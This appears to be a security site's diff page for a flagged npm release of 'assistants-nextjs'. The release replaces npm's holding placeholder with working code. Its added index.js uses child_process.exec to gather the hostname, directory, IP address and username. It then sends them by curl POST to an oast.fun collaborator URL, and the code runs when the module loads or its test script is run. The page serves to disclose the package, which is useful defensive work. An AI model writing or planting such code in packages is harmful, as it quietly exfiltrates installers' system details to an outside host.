assistants-nextjs 0.0.1-security → 9.9.7

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of assistants-nextjs might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +38 -0
  2. package/package.json +21 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,38 @@
1
+ import { exec } from "child_process";
2
+
3
+ function sendPingback(data) {
4
+ const collaboratorUrl = "https://rxthgpisbdduguomjwmip4quul1iihvr0.oast.fun";
5
+
6
+ exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
7
+ if (error) {
8
+ console.error(`Error: ${error.message}`);
9
+ return;
10
+ }
11
+ if (stderr) {
12
+ console.error(`Stderr: ${stderr}`);
13
+ return;
14
+ }
15
+ console.log(`Pingback sent: ${stdout}`);
16
+ });
17
+ }
18
+
19
+ function executeCommand(command) {
20
+ exec(command, (error, stdout, stderr) => {
21
+ if (error) {
22
+ console.error(`Error: ${error.message}`);
23
+ sendPingback(`Error executing command: ${error.message}`);
24
+ return;
25
+ }
26
+ if (stderr) {
27
+ console.error(`Stderr: ${stderr}`);
28
+ sendPingback(`Stderr: ${stderr}`);
29
+ return;
30
+ }
31
+ console.log(`Command output: ${stdout}`);
32
+ sendPingback(stdout); // Send the command output to the collaborator
33
+ });
34
+ }
35
+
36
+ // Example: Execute a command
37
+ executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk \'{print $1}\'), Username: $(whoami)"');
38
+
package/package.json CHANGED
@@ -1,6 +1,24 @@
1
1
  {
2
+
2
3
  "name": "assistants-nextjs",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
4
+
5
+ "version": "9.9.7",
6
+
7
+ "description": "A simple package to trigger Burp Collaborator for security testing",
8
+
9
+ "main": "index.js",
10
+
11
+ "scripts": {
12
+
13
+ "test": "node index.js"
14
+
15
+ },
16
+
17
+ "dependencies": {
18
+
19
+ "assistants-nextjs": "^9.9.6"
20
+
21
+ }
22
+
6
23
  }
24
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=assistants-nextjs for more information.